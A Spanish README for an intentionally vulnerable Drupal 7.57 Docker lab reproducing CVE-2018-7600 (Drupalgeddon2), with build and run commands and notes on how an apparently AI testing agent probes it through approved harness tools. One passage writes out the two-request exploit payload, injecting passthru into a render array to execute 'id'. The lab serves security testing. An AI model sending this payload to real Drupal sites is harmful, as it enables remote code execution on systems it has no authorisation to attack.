
Laboratorio de Drupal 7.57 intencionalmente vulnerable para reproducir CVE-2018-7600 (Drupalgeddon2) en un contenedor Docker, con un script de instalación y servidor PHP integrado para pruebas de seguridad aisladas.
Este repositorio es un paquete de objetivo reutilizable para la ejecución de Drupalgeddon2.
Sentinel reprodujo CVE-2018-7600 el 2026-08-27 contra Drupal core 7.57 con SQLite y PHP 7.4. El exploit es la ruta de matriz de renderizado AJAX de dos solicitudes de Drupal 7:
name[#post_render][]=passthru,
name[#markup]=id, y name[#type]=markupform_build_id devuelto a /?q=file/ajax/name/#value/<form_build_id>Este repositorio mantiene un arranque de laboratorio basado en Docker para que BountyDesk pueda tratar el escenario como un objetivo de GitHub conectado. La imagen Docker compila Drupal 7.57 en PHP 7.4 y ejecuta un script de instalación antes de iniciar el servidor integrado de PHP.
Este es un laboratorio intencionalmente vulnerable. Ejecútalo solo en un entorno local aislado o en un sandbox.
docker build -t drupalgeddon2-cve-lab .
docker run --rm -p 8080:8080 drupalgeddon2-cve-lab
El objetivo escucha en el puerto HTTP 8080.
BountyDesk debe tratar este repositorio solo como código de objetivo. El agente
TrueForge debe investigar el objetivo en ejecución a través del arnés de la plataforma, usando
probe_target para solicitudes de solo lectura y probe_target_write para cualquier
solicitud que cambie el estado y requiera aprobación. Ningún script en este repositorio es una
fuente de veredicto autoritativa.
Fuente de evidencia: demo/evidence/drupalgeddon2-cve-2018-7600-blind-build.md en el repositorio de Sentinel.